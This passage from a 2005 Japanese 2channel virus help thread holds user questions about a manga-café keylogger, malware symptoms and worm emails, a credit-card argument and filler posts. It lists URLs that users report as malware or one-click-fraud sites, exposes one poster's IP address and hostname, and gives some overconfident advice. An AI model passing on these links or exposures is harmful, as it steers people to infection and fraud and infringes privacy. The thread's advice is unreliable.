そんなに漫画喫茶とはキーロガー入ってるのか?
891名無しさん@お腹いっぱい。:2005/12/21(水) 00:36:00
http://thumbstower.com/?pics/animals/pages/2166.jpg

これをクリックしてしまって、壁紙が変になりました
あと、見たこともないツールバーが出来て消えません
対処法を教えてください
892名無しさん@お腹いっぱい。:2005/12/21(水) 00:36:29
>>889
100%漏洩する事を前提に対処するしかないでしょう。

カードについてはこまめにチェックして、不正使用を見つけたら
すぐにカード会社に連絡するしか無いと思われ。
不正使用が発覚したら、番号変えて再発行してもらえると思うけど
マンガ喫茶でキーロガー仕込まれてとなると再発行手数料は取られるのでは。

>キーロガーが仕込まれていた場合、100%情報漏れするのでしょうか?
>(カード番号はいつもの癖で、適当な数字を入れたあと、デリートして正しい番号を
>入力するやり方をしたのですが、少しは意味ありますか?)
あんまり意味無いと思う。
キー入力を辿っていけば最終的に正しい番号に行き着くんだから。
893あぼーん:あぼーん
あぼーん
894名無しさん@お腹いっぱい。:2005/12/21(水) 01:14:38
>>889
まずキーロガーの名前がわからないと
んで、貴方が使ったあとに誰かが使ったのかどうかも重要なんだが
ダイレクトに送信されてなければまず安心だし
そもそもキーロガーが検出されたならまず店員に訴えろ
あのデリートはまったく意味ない
895名無しさん@お腹いっぱい。:2005/12/21(水) 01:35:32
>>891
リカバリ
896889:2005/12/21(水) 01:36:41
アドバイスありがとうございます。
カード利用状況を毎日チェックする以外なさそうですね。
スパムやDMは自業自得ですので諦めています。

キーロガーの種類等は覚えておりません。
検出された瞬間に焦って削除してしまいました。
なにしろ【危険度10】表示でしたので、冷静な対応がとれませんでした。
普段は気を付けているのに今日に限ってと、激しい自己嫌悪です。
 
897名無しさん@お腹いっぱい。:2005/12/21(水) 09:57:14
マンガ喫茶でカードでお買い物

それを「自業自得」と言う。
898名無しさん@お腹いっぱい。:2005/12/21(水) 11:10:47
これいまスパムでおくられてきた

ワンクリ詐欺か

http://www.bronzemedalist.com/boin/?c1ec7039607025351465e9c56c87136d865f44
899名無しさん@お腹いっぱい。:2005/12/21(水) 11:49:38
>898
おまえのメールアドレスが、?の次から登録されているぞ
900名無しさん@お腹いっぱい。:2005/12/21(水) 12:15:23
あはっ  かわいそ
901名無しさん@お腹いっぱい。:2005/12/21(水) 13:42:43
メアドは知りませんがリモホは晒されてます

検索結果
IPアドレス 219.110.29.141
ホスト名 h219-110-29-141.catv02.itscom.jp
IPアドレス
 割当国 ※ 日本 (JP)
接続回線 CATV
[登録者名] イッツ・コミュニケーションズ株式会社
[Registrant] its communications Inc.


70 名前:お願いします[] 投稿日:2005/12/21(水) 12:53:22 HOST:h219-110-29-141.catv02.itscom.jp
http://pc8.2ch.net/test/read.cgi/sec/1129958911/898

削除理由
個人情報(メールアドレス)がさらされていると指摘を
受けました
すいませんが削除ねがいます
902名無しさん@お腹いっぱい。:2005/12/21(水) 14:06:59
jun○○くん、早く削除してもらえ
903名無しさん@お腹いっぱい。:2005/12/21(水) 14:31:45
自分で書いた馬鹿がいるのか。 ほほえましいな。
904名無しさん@お腹いっぱい。:2005/12/21(水) 15:14:08
@dd.catv.ne.jp
存在しないホストなので晒します
905名無しさん@お腹いっぱい。:2005/12/21(水) 22:20:27
モニタのコントラスト設定などが勝手にいじられるウィルスに感染したようなのですが どなたかこのウィルスについて詳細をおねがいします
【使用OS】 XP
【WindowsUpdateしてるか】 してません
【AntiVirusは何を使っているか】ウィルスバスター
【ちゃんとUpdateしてるか】 ほぼ毎日
【スキャンした結果(ウイルス名・発見場所)】 ウィルスバスターで最新の定義(12月21日)を入れてスキャンしても何も引っかからないようです
【別のオンラインスキャンしたならその結果は】 他所では行ってません
【症状を具体的に、分かる限りすべて書く】 モニタについてるボタンでいじれるコントラスト設定などが突然現れ、勝手にいじられたり、出たり消えたりします でている間はこちらからの操作はうけつけません
【何をしたらそんなことになったのか】 PCに電源を入れたら症状が現れたので原因は今のところ特定できません
【これまでにとった措置】 とくになし
【その他の質問】 とくになし
上のウィルスバスターですが、最新の定義(12月21日)を入れてスキャンしても何も引っかからないようです
症状が出て2時間くらいで今のところ沈静化してますが不安です
906名無しさん@お腹いっぱい。:2005/12/21(水) 23:19:37
>【使用OS】 XP
>【WindowsUpdateしてるか】 してません

おととい来てください。
907名無しさん@お腹いっぱい。:2005/12/22(木) 14:30:03
73 名前:お願いします [] 投稿日:2005/12/21(水) 16:49:31 HOST:h219-110-29-141.catv02.itscom.jp
おいそがしいとこすいません
それがわたしのところにその都度メールがきてしまうんです
ごめんどうでも削除ねがいます

74 名前:削除( ゚д゚)y-~ ★ [sage] 投稿日:2005/12/21(水) 17:30:36 ID:???0
>>73
意味がわかりません。
却下。
リンク先の機能でメールを送る機能があるとかってんならリンク先サーバの管理者に言ってください。
2chとは関係がありません。
908名無しさん@お腹いっぱい。:2005/12/22(木) 15:11:01
【使用OS】 XP sp2
【WindowsUpdateしてるか】 ○
【AntiVirusは何を使っているか】 avast
【ちゃんとUpdateしてるか】 ○
【スキャンした結果(ウイルス名・発見場所)】 (Win32:Sober-AB2 [Wrm])
【別のオンラインスキャンしたならその結果は】 不明
【症状を具体的に、分かる限りすべて書く】 ウイルスメールが届いてavastが反応
【何をしたらそんなことになったのか】 今日午前中から10件、いままで無し
【これまでにとった措置】 avastで受信時削除
【その他の質問】 どうしたらいいんだろ、メアド変更?
909名無しさん@お腹いっぱい。:2005/12/22(木) 15:20:05
>>908
それって、相手の問題だろ。
どこかの誰かが感染して送っているだけだろ
ただ、送り先も偽装されているから特定できないだけだろ
910名無しさん@お腹いっぱい。:2005/12/22(木) 15:57:46
911名無しさん@お腹いっぱい。:2005/12/22(木) 16:00:44
ごめん失敗しました
これなんですか?
tp://www.geocities.co.jp/kiseki_kizuna/test.html
912名無しさん@お腹いっぱい。:2005/12/22(木) 16:15:06
これを踏んでしまいました。すぐに電源を切ったんですが
大丈夫でしょうか?

http://thumbstower.com/?pics/animals/pages/2161.jpg

913名無しさん@お腹いっぱい。:2005/12/22(木) 16:17:22
直リンすか・・・
914912:2005/12/22(木) 16:19:56
すまん。直リンしてしまいました。初心者ですいません。
915名無しさん@お腹いっぱい。:2005/12/22(木) 16:20:51
どんまい
916名無しさん@お腹いっぱい。:2005/12/22(木) 16:32:55
>>912
そこウイルスあるよ。
鑑定スレでも散々出てた。
917912:2005/12/22(木) 16:49:57
>>916

どうすればよいのでしょうか?すぐに電源を切ったのですが、
異常があるのかどうかもわからないのです。別に
なんともないようなのですが・・・。
918名無しさん@お腹いっぱい。:2005/12/22(木) 16:55:31
ネットに繋げてない自分のパソコンで
筆グルメを使い年賀状のファイル(jpg)を作りました。
そのファイルをSDカードに保存して、知人の家のパソコンでファイルを開いて
年賀状を印刷したのですが、家に帰ってきてSDカードを開いてみると
SDカードの中に保存した覚えのない
FgwGrpという名称のexcel csvファイルが作成されてました。
Fgwは多分、年賀状ソフトの筆グルメの関係のファイルだと思うのですが
筆グルメを起動させたもののSDカードに保存した覚えは全くありません。
ttp://www.google.co.jp/search?hl=ja&q=%EF%BC%A6%EF%BD%87%EF%BD%97%EF%BC%A7%EF%BD%92%EF%BD%90&lr=
ちなみにネットカフェで"FgwGrp"でググってみたらこういう検索結果になったのですが
おそらく検索結果の一番下と下から二番目のサイトと
同じファイルだと思います。
このファイルはウィルスでしょうか?

知人にウィルスチェックをしてもらおうと連絡をしてるのですが、
全然連絡が来ないので、申し訳ないのですがここで質問させてください。
ウィルスじゃなくても勝手にファイルが作成されることは
あるのでしょうか?
919名無しさん@お腹いっぱい。:2005/12/22(木) 18:54:24
筆ぐるめの住所関係のファイルじゃねーの?
もう一度ソフト使って再現するか試してみたら? もしくは開いてみろよ
920名無しさん@お腹いっぱい。:2005/12/22(木) 19:17:32
>>917
WindowsUpdate最新状態なら感染しない。
921名無しさん@お腹いっぱい。:2005/12/22(木) 22:31:51
>>889
カード止めれば問題ないだろ。
相手が利用すれば必ず足つくし。
922名無しさん@お腹いっぱい。:2005/12/23(金) 00:31:32
>>921
そだね。確かにカード会社に一方入れておいた方が良いかも。
問題はカード会社側が「キーロガーで漏れた『かも』」って情報で動いてくれるかどうか。
923名無しさん@お腹いっぱい。:2005/12/23(金) 00:44:36
>>922
お前カード使ったことないのか。そんなもん速攻で止めてくれるに決まってるだろ。
こっちは顧客だぞ。動いてくれるかどうかってどういう意味だ。そのか『かも』で動きたくないのはむしろこっちだ。
924名無しさん@お腹いっぱい。:2005/12/23(金) 00:47:09
>>923
割と使ってるけど止めたことはありませんが何か?
925名無しさん@お腹いっぱい。:2005/12/23(金) 01:09:16
>>924
カード会社が止めてくれるのか、という話をしてるのだが? それがどうかしたのか。
926名無しさん@お腹いっぱい。:2005/12/23(金) 01:12:06
>>925
つまり、止めたことが無いから対応してくれるかどうか保証出来ないって事。
不正使用についてDQNな対応された事例も対応が良い事例もぐぐれば出てくるし、
連絡してみなければ望んだ対応が得られるかどうか分かんないでしょ?
927名無しさん@お腹いっぱい。:2005/12/23(金) 01:14:58
それとも実際に対応してくれた経験があるから「止めてくれるに決まってる」と断言してるわけ?
それなら何も言うことはない。経験無いのにあやふやな事書いてスマンかったと謝るよ。
928名無しさん@お腹いっぱい。:2005/12/23(金) 01:26:16
お前の経験にせよ922の経験にせよ、そういう経験があったらどうだというんだ。
それともそういう経験がある、というたったひとつの事例で納得するのか。だったらぐぐった内容で納得しとけよ。
929名無しさん@お腹いっぱい。:2005/12/23(金) 01:28:35
>>928
だから対応が一定だとは限らないから保証できないと言ってるんだけど。
で、「決まってる」と断言できる根拠は?
930名無しさん@お腹いっぱい。:2005/12/23(金) 01:31:02
>>929
止めない理由がない。止めないことによる弊害が大きすぎる。
というかお前、今すぐ電話してみろ。経験がないのなら今すぐ作れ。
931名無しさん@お腹いっぱい。:2005/12/23(金) 01:35:10
>>930
止めなくても不正使用があったら保険で補填されるからカード会社に実害は発生しない。
カード会社がそう理屈を捏ねて対応を渋る可能性は全く無いと?
932名無しさん@お腹いっぱい。:2005/12/23(金) 01:43:26
>>931
止めろと言ったのに止めなかった場合は保険が適用されない。
933名無しさん@お腹いっぱい。:2005/12/23(金) 01:44:06
>>932
そうなんだ。
で、実際に止めてくれるという保証は?
934名無しさん@お腹いっぱい。:2005/12/23(金) 01:46:02
>>931
ていうかそれ理屈になってるのか?
電話口で「不正使用があっても保健で補填されますから」と言われるのか
それが事実としてあるのなら、絶対に補填されるのなら、カードを止める、という行動は存在しなくなるな
935名無しさん@お腹いっぱい。:2005/12/23(金) 01:49:30
うるせぇな、他所行ってやれよ。
936名無しさん@お腹いっぱい。:2005/12/23(金) 01:49:41
>>934
電話口でそういうかどうかは別として、それを背景として対応を渋る可能性はあるだろ?
「万一、不正使用があったとしてもお客様に損害は及びません」
ってのはクレジット系の常套句だし、その裏に「ウチの会社にも」って本音があるのは容易に想像できる。
937名無しさん@お腹いっぱい。:2005/12/23(金) 01:51:01
>>933
常識的にカード会社に損失、損害がある、だから止める、という主張であり
そもそもお前の主張ってのがわからない。お前は一体どうしたいの?
止めてくれるかどうかわからない、と言いたいだけか?
わからないんだったら確かめてみればいい。この話に価値があるとは思えない。
止めてくれるならそれでよし。止めてくらなかったらどうなると思う。その場合を考えた方が有意義だ。
938名無しさん@お腹いっぱい。:2005/12/23(金) 01:52:24
     .r'丁´ ̄ ̄ ̄ ̄`7¬‐,-、           /
    r'| |          |  |/  >、     /
    ! | |          |  |レ'´/|       |   待 て
    | | |   /\   |  |l  /⊂う    |
    | | |__∠∠ヽ_\ |  リ /  j     ヽ   あ わ て る な
    |´ ̄   O   ̄ ̄ ̄ ̄ ̄`!      〉
    l'"´ ̄ ̄ヾ'"´ ̄ ̄`ヾ::幵ー{       /   こ れ は 孔 明 の
    ⊥,,,,,_、    ___,,,,,ヾ| l::::::|      |
     lヾ´ f}`7   ヘ´fj ̄フ  | l::i'⌒i    |   罠 だ
     l ,.ゝ‐イ    `‐=ニ、i | l´ ( }    ヽ
     l     {         U | l 、_ノ    ∠ヘ
    l   / ̄  ''ヽ、   | l ヽ_       \,________
      !  ハ´ ̄ ̄ ̄`ト、  |亅〃/\
    ,人 f ´ ̄ ̄ ̄``ヾ  j ,!// {_っ )、
  // `ト、__iiiii______,レ'‐'//  _,/ /スァ-、
,.イl{ { 々 !/´しllllト、 ̄`ヽ、 // /´,.-、 /彑ゝ-{スァ-、
939名無しさん@お腹いっぱい。:2005/12/23(金) 01:52:44
>>937
だから「対応が保証できない」と言ってるだけで、「止めてくれない」とは言ってないだろ。
それに「止めるに決まってる」と噛みついてるのはそっちだ。
940名無しさん@お腹いっぱい。:2005/12/23(金) 01:53:08
>>936
>容易に想像できる
お前の想像なんかどうだっていいよ。
941名無しさん@お腹いっぱい。:2005/12/23(金) 01:54:04
>>940
うん、その感想もどうだっていいな。
942名無しさん@お腹いっぱい。:2005/12/23(金) 01:58:45
>>939
だからさぁ、その保証が何のためにほしいんだよ。そんな低い可能性まで考慮して会話してんの?
とりあえず止めたいなら電話すればいい。電話する前に「対応が保証できない」って何のための言葉なんだ。
つまり対応が保証できなかったら何なわけ?
常識的な判断が来れば止める、それを止めるに決まっていると言った。それを100%と受け取りたいのか?
943名無しさん@お腹いっぱい。:2005/12/23(金) 02:01:13
専ブラでいらいら棒

スタート  >1-1000>1-1000>1-1000>1-1000>1-1000>1-1000>1-100
>1-1000      >1-1000     >1-1000              >1-100
>1-1000>1-1000 >1-1000 >1-9  >1-1000  >1-1000>1-100  >1-100
>1-1000>1-1000 >1-1000 >1-10  >1-1000  >1-1000>1-100  >1-100
>1-1000      >1-1000 >1-100  >1-1000  >1-1000>1-100  >1-100
>1-1000 >1-1000>1-1000 >1-1000  >1-1000 >1-1000>1-100     >1-100
>1-1000             >1-1000         >1-100>1-10>1-10     >1-100
>1-1000>1-1000>1-1000>1-1000>1-1000>1-1000>1-1000>1-1000>1-1000ゴール
944名無しさん@お腹いっぱい。:2005/12/23(金) 02:03:19
>>942
だからさぁ、「電話してみなければわからないからとりあえず電話してみれ」と言ってるんだ。
そこから窓口がどう対応するかは個別の問題であって、電話する前から「決まってる」と
断言する事じゃないだろ?

>>923を読んだら喧嘩売ってるとしか思えないから反論した。
売り言葉に買い言葉でお互いエキサイトした。この話は結局それだけじゃないのか?
945名無しさん@お腹いっぱい。:2005/12/23(金) 02:06:30
>>943
難しいね、これ(w
946名無しさん@お腹いっぱい。:2005/12/23(金) 02:11:11
>>944
>売り言葉に買い言葉でお互いエキサイトした。この話は結局それだけじゃないのか?
ああ、そんなもんだね。2ちゃんの風物詩みたいなもんだと思ってる。
だが俺は会話においては断言するよ。大方、8割方のことを決まっていると表現することになんの落ち度も感じない。
947名無しさん@お腹いっぱい。:2005/12/23(金) 02:14:28
>>946
そこに基本的なスタンスの違いがあるってこと。
俺は確証があること以外は保証しない。責任をとれないことは断言しない。
そこで擦れ違ってただけなんだから、これでこの話は終わりって事でOK?
948名無しさん@お腹いっぱい。:2005/12/23(金) 02:37:30
>>947
悪かったなー!もうすぐイブなのに男1人でやることなかったもんでなー!俺は起きてるけどお前は寝ろ!
949名無しさん@お腹いっぱい。:2005/12/23(金) 02:57:20
>>947
イブまであと1日あるぞ。諦めるな。諦めたら負けだぞ。
950名無しさん@お腹いっぱい。:2005/12/23(金) 02:59:54
>>944
難しい
951名無しさん@お腹いっぱい。:2005/12/23(金) 03:00:33
950ゲト
952名無しさん@お腹いっぱい。:2005/12/23(金) 03:11:42
次スレ

ウィルス情報&質問 総合スレッド☆Part34
http://pc8.2ch.net/test/read.cgi/sec/1135274553/
953名無しさん@お腹いっぱい。:2005/12/23(金) 05:08:53
954名無しさん@お腹いっぱい。:2005/12/23(金) 10:15:07
>>952
955名無しさん@お腹いっぱい。:2005/12/23(金) 23:06:13
うめ
956名無しさん@お腹いっぱい。:2005/12/24(土) 01:00:27
うめ

957名無しさん@お腹いっぱい。:2005/12/24(土) 09:04:17
うめ
958名無しさん@お腹いっぱい。:2005/12/24(土) 11:17:34
産め
959名無しさん@お腹いっぱい。:2005/12/24(土) 11:22:11
うめだ
960名無しさん@お腹いっぱい。:2005/12/24(土) 13:52:17
       ∧∧  
〜′ ̄ ̄( ゚Д゚)  「膿め」
 UU ̄ ̄ U U
961名無しさん@お腹いっぱい。:2005/12/24(土) 15:25:51
♪♪♪ ♪♪♪ ♯♭ ♪♪♪♪♪♪♪ ♯♭ ♪♪ ♯♭ ♪♯♪♪
♪♪♪ ♯♭ ♪♪♪♪♪♪♪ ♯♭ ♪♪ ♯♭ ♪♯♪♪♪♯♪♪
二二二二二二l  /♭ | ̄♪♪ ̄ ̄|   引っ越し!引っ越し!! アー!!
 | | ♪ ♯_______ ♪/  | ♪♪♪ ∧_∧    さっさと引っ越〜し!!
 | | \ |◎□◎|. / | ♪ ♯ <`Д´ >つ─◎    しばくぞッッ!!!!
 | | /´♪ ̄ ̄ ̄ ̄/⌒ヽ.|   /´ ̄し' ̄し' \ ///. ♪♪♪♪アー 
 ̄ ̄| ♪ ♯♭ | | ̄ ̄ ̄|  、_人_ /  彡 ◎ ̄ ̄ ̄ ̄ ̄
 ♯ |   ♪♪ | |      |  _)  ◎彡.| |   バン ♪♯♪♪♪ ♯♭ 
♪♪ |      | |     |  ´`Y´   .| |  バン ♭♭♪ ♪ ♯♭ 
♪♪ t______t,,ノ     t_______t,ノ ♪♯♪♪♪♯♪♪
♪♪♪ ♯♭ ♪♪♪♪ ♯♭ ♪♪♪♪♪♪♪ ♯♭ ♪♪ ♯♭ ♯♭
962名無しさん@お腹いっぱい。:2005/12/24(土) 15:27:26
  ∧_∧
 ( ´・ω・) ∫ うー、サブッ
 //\ ̄ ̄旦\
// ※\___\
\\  ※  ※ ※ ヽ
  \ヽ-―――――ヽ
963名無しさん@お腹いっぱい。:2005/12/24(土) 15:54:31
            ∧,,∧
           ( ´・ω・)
       ____(____)__
      / \    旦   __\
     .<\※ \____|\____ヽ
        ヽ\ ※ ※ ※| |====B=|
        \`ー──-.|\|___l__◎..|ヽ
          ̄ ̄ ̄ ̄| .| ̄ ̄ ̄ ̄|
               \|        |〜
            _∧,,∧
       ___( ( ´・ω・)___ フゥ・・・
      / \    ̄旦 ̄__\
     .<\※ \____|\____ヽ
        ヽ\ ※ ※ ※| |====B=|
        \`ー──-.|\|___l__◎..|ヽ
          ̄ ̄ ̄ ̄| .| ̄ ̄ ̄ ̄|
               \|        |〜
           _________
.         /             /
 ..ギャァーー!!!! /             /
  アッチー!!!! /             /
 __      /             /   バタンッ!
(__()、;.o:。 /_________/
    ゚*・/ \ ※     ※__\
     .<\※ \_____※___|\____ ヽ
        ヽ\ ※ ※ ※.| |====B=|
        \`ー──-.|\|___l__◎..|ヽ
          ̄ ̄ ̄ ̄| .| ̄ ̄ ̄ ̄|
               \|        |〜
964名無しさん@お腹いっぱい。:2005/12/24(土) 16:05:24
不覚にもワラタ
965名無しさん@お腹いっぱい。:2005/12/24(土) 22:35:57
sockets de troisに感染したみたいなメッセージが出るんですけど
対処法が分かりません だれか教えて
966名無しさん@お腹いっぱい。:2005/12/25(日) 14:50:22
    ∧_∧  / ̄ ̄ ̄ ̄
  ∧( ´∀`)< あげ
 ( ⊂    ⊃ \____
 ( つ ノ ノ
 |(__)_)
 (__)_)
967名無しさん@お腹いっぱい。:2005/12/25(日) 16:39:20
(´・ω・`) 偉いお
968名無しさん@お腹いっぱい。:2005/12/28(水) 21:42:18
うめ
969名無しさん@お腹いっぱい。:2005/12/28(水) 21:42:50
|| 童貞卒業予定者発表   ||      。         。
|| 101 204 214 231 250 || ゜       〜
|| 356 378 401 409 421 ||   。         。
|| 438 444 666 764 867 ||
|| 990 995 997 999 1000 ||        。   ∧_∧
||______________.||          。 (・∀・  )漏れのレス番号は入ってるかな…。
||                 .||         ⊂    つ
970名無しさん@お腹いっぱい。:2005/12/28(水) 21:44:35
                  ∧_∧
           (⌒─ ( ´・ω・)  
..\         ((´^ω^/u  ノ
  \         /u 〈/フ'フ       
    \       〈 ///           
     \      ∠∠/               
\     \    彡
 .\     .\   
   .\_/| ̄ ̄ ̄ ̄ ̄|
        . |       .|
971名無しさん@お腹いっぱい。:2005/12/28(水) 22:44:14
感謝しているので梅ます
972名無しさん@お腹いっぱい。:2005/12/28(水) 22:44:45
感謝しているので梅ます
973名無しさん@お腹いっぱい。:2005/12/28(水) 22:45:19
感謝しているので梅ます
974名無しさん@お腹いっぱい。:2005/12/28(水) 22:45:51
感謝しているので梅ます
975名無しさん@お腹いっぱい。:2005/12/28(水) 22:46:23
感謝しているので梅ます
976名無しさん@お腹いっぱい。:2005/12/28(水) 22:46:54
感謝しているので梅ます
977名無しさん@お腹いっぱい。:2005/12/28(水) 22:47:24
感謝しているので梅ます
978名無しさん@お腹いっぱい。:2005/12/28(水) 22:47:55
感謝しているので梅ます
979名無しさん@お腹いっぱい。:2005/12/28(水) 22:50:23
本当は感謝してねぇけど梅
980名無しさん@お腹いっぱい。:2005/12/28(水) 22:50:54
本当は感謝してねぇけど梅
981名無しさん@お腹いっぱい。:2005/12/28(水) 22:51:25
本当は感謝してねぇけど梅
982名無しさん@お腹いっぱい。:2005/12/28(水) 22:51:56
本当は感謝してねぇけど梅
983名無しさん@お腹いっぱい。:2005/12/28(水) 22:52:27
本当は感謝してねぇけど梅
984名無しさん@お腹いっぱい。:2005/12/28(水) 22:53:34
感謝しているので梅ます
985名無しさん@お腹いっぱい。:2005/12/28(水) 22:54:11
感謝しているので梅ます
986名無しさん@お腹いっぱい。:2005/12/28(水) 22:54:30
二二二二二二l      | ̄ ̄ ̄ ̄ ̄|   さっさと引っ越引っ越し!
 | |  ♪ _________ ♪   |      ∧_∧    さっさと引っ越引っ越し!
 | |    |◎□◎|.   |     <`д´ >つ─◎ 
 | | /´ ̄ ̄ ̄ ̄/⌒ヽ.|   /´ ̄し' ̄し' \ ///.  
 ̄ ̄|       | | ̄ ̄ ̄|  、_人_ /  彡 ◎ ̄ ̄ ̄ ̄ ̄
    |       | |      |  _)  ◎彡.| |   バン
    |       | |     |  ´`Y´   .| |  バン
    t______t,,ノ     t_______t,ノ
987名無しさん@お腹いっぱい。:2005/12/28(水) 22:54:45
感謝しているので梅ます
988名無しさん@お腹いっぱい。:2005/12/28(水) 22:55:04
♪♪♪ ♪♪♪ ♯♭ ♪♪♪♪♪♪♪ ♯♭ ♪♪ ♯♭ ♪♯♪♪
♪♪♪ ♯♭ ♪♪♪♪♪♪♪ ♯♭ ♪♪ ♯♭ ♪♯♪♪♪♯♪♪
二二二二二二l  /♭ | ̄♪♪ ̄ ̄|   引っ越し!引っ越し!! アー!!
 | | ♪ ♯_______ ♪/  | ♪♪♪ ∧_∧    さっさと引っ越〜し!!
 | | \ |◎□◎|. / | ♪ ♯ <`Д´ >つ─◎    しばくぞッッ!!!!
 | | /´♪ ̄ ̄ ̄ ̄/⌒ヽ.|   /´ ̄し' ̄し' \ ///. ♪♪♪♪アー 
 ̄ ̄| ♪ ♯♭ | | ̄ ̄ ̄|  、_人_ /  彡 ◎ ̄ ̄ ̄ ̄ ̄
 ♯ |   ♪♪ | |      |  _)  ◎彡.| |   バン ♪♯♪♪♪ ♯♭ 
♪♪ |      | |     |  ´`Y´   .| |  バン ♭♭♪ ♪ ♯♭ 
♪♪ t______t,,ノ     t_______t,ノ ♪♯♪♪♪♯♪♪
♪♪♪ ♯♭ ♪♪♪♪ ♯♭ ♪♪♪♪♪♪♪ ♯♭ ♪♪ ♯♭ ♯♭
989名無しさん@お腹いっぱい。:2005/12/28(水) 22:55:16
感謝しているので梅ます
990名無しさん@お腹いっぱい。:2005/12/28(水) 22:55:47
感謝しているので梅ます
1000ゲットーーーーーーーーーーーーーーーーーーーーーーー
991名無しさん@お腹いっぱい。:2005/12/28(水) 22:56:18
感謝しているので梅ます
早かったです。すみません・・・・・・
992名無しさん@お腹いっぱい。:2005/12/28(水) 22:56:49
感謝しているので梅ます
余裕の2ゲットーーーーーーーーーーーーーーーーーーー
993名無しさん@お腹いっぱい。:2005/12/28(水) 22:57:19
感謝しているので梅ます
すみません・・・少し遅かったです。
994名無しさん@お腹いっぱい。:2005/12/28(水) 22:57:35
本当は感謝してねぇけど梅
995名無しさん@お腹いっぱい。:2005/12/28(水) 22:57:53
感謝しているので梅ます
996名無しさん@お腹いっぱい。:2005/12/28(水) 22:58:06
本当は感謝してねぇけど梅
997名無しさん@お腹いっぱい。:2005/12/28(水) 22:58:22
感謝しているので梅ます
絶対1000とられます。
本当にありがとうございました
998名無しさん@お腹いっぱい。:2005/12/28(水) 22:58:41
本当は感謝してねぇけど梅
999名無しさん@お腹いっぱい。:2005/12/28(水) 22:58:53
感謝しているので梅ます
999getです
1000ならunk


1000名無しさん@お腹いっぱい。:2005/12/28(水) 22:59:11
本当は感謝してねぇけど梅
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。